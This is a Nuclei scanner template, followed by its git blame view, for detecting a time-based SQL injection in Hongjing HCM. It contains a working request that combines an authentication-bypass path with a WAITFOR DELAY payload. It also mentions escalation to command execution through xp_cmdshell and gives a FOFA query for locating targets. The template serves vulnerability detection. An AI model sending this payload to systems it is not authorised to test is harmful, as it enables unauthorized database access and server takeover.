nuclei-templates/http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml

id: hjsoft-hcm-tb-sqli

info:
  name: Hongjing HCM - Time-Based Sql Injection
  author: securityforeveryone
  severity: high
  description: |
    There is a SQL injection vulnerability in the /gz/LoadOtherTreeServlet interface of Hongjing HCM. Unauthenticated remote attackers can use the SQL injection vulnerability with the database xp_cmdshell to execute arbitrary commands and control the server. After analysis and judgment, the vulnerability is easy to exploit and it is recommended to be fixed as soon as possible.
  reference:
    - https://github.com/wy876/POC/blob/main/%E5%AE%8F%E6%99%AFeHR%E4%BA%BA%E5%8A%9B%E8%B5%84%E6%BA%90%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3LoadOtherTreeServlet%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="HJSOFT-HCM"
  tags: sqli,hjsoft,management-system

http:
  - raw:
      - |
        @timeout: 20s
        GET /w_selfservice/oauthservlet/%2e./.%2e/gz/LoadOtherTreeServlet?modelflag=4&budget_id=1%29%3BWAITFOR+DELAY+%270%3A0%3A6%27--&flag=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'contains_all(body,"TreeNode","tab_id")'
          - 'contains(header,"text/xml")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a004830460221008487f7999fa553bab3563df81495c9656a7959996091429dd5766ab506c198c0022100f8edadd2fa4f855af54c21c8f9d62b72a3ad53c82ba3196c1c969e492e1368fa:922c64590222798bb761d5b6d8e72950
add hj time based sqli 2024-07-08 23:05:52 +00:00			`id: hjsoft-hcm-tb-sqli`
Update and rename hjsoft-hcm-tb-sqli.yaml to hjsoft-hcm-tb-sqli.yaml 2024-07-09 10:34:16 +00:00
add hj time based sqli 2024-07-08 23:05:52 +00:00			`info:`
			`name: Hongjing HCM - Time-Based Sql Injection`
			`author: securityforeveryone`
Update and rename hjsoft-hcm-tb-sqli.yaml to hjsoft-hcm-tb-sqli.yaml 2024-07-09 10:34:16 +00:00			`severity: high`
add hj time based sqli 2024-07-08 23:05:52 +00:00			`description: \|`
			`There is a SQL injection vulnerability in the /gz/LoadOtherTreeServlet interface of Hongjing HCM. Unauthenticated remote attackers can use the SQL injection vulnerability with the database xp_cmdshell to execute arbitrary commands and control the server. After analysis and judgment, the vulnerability is easy to exploit and it is recommended to be fixed as soon as possible.`
			`reference:`
			`- https://github.com/wy876/POC/blob/main/%E5%AE%8F%E6%99%AFeHR%E4%BA%BA%E5%8A%9B%E8%B5%84%E6%BA%90%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3LoadOtherTreeServlet%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md`
			`metadata:`
			`verified: true`
			`max-request: 1`
			`fofa-query: app="HJSOFT-HCM"`
Update and rename hjsoft-hcm-tb-sqli.yaml to hjsoft-hcm-tb-sqli.yaml 2024-07-09 10:34:16 +00:00			`tags: sqli,hjsoft,management-system`
add hj time based sqli 2024-07-08 23:05:52 +00:00
			`http:`
			`- raw:`
			`- \|`
			`@timeout: 20s`
			`GET /w_selfservice/oauthservlet/%2e./.%2e/gz/LoadOtherTreeServlet?modelflag=4&budget_id=1%29%3BWAITFOR+DELAY+%270%3A0%3A6%27--&flag=1 HTTP/1.1`
Update and rename hjsoft-hcm-tb-sqli.yaml to hjsoft-hcm-tb-sqli.yaml 2024-07-09 10:34:16 +00:00			`Host: {{Hostname}}`
add hj time based sqli 2024-07-08 23:05:52 +00:00
			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'duration>=6'`
Update and rename hjsoft-hcm-tb-sqli.yaml to hjsoft-hcm-tb-sqli.yaml 2024-07-09 10:34:16 +00:00			`- 'contains_all(body,"TreeNode","tab_id")'`
			`- 'contains(header,"text/xml")'`
add hj time based sqli 2024-07-08 23:05:52 +00:00			`- 'status_code == 200'`
			`condition: and`
Auto Template Signing [Wed Jul 10 06:10:27 UTC 2024] :robot: 2024-07-10 06:10:27 +00:00			`# digest: 4b0a004830460221008487f7999fa553bab3563df81495c9656a7959996091429dd5766ab506c198c0022100f8edadd2fa4f855af54c21c8f9d62b72a3ad53c82ba3196c1c969e492e1368fa:922c64590222798bb761d5b6d8e72950`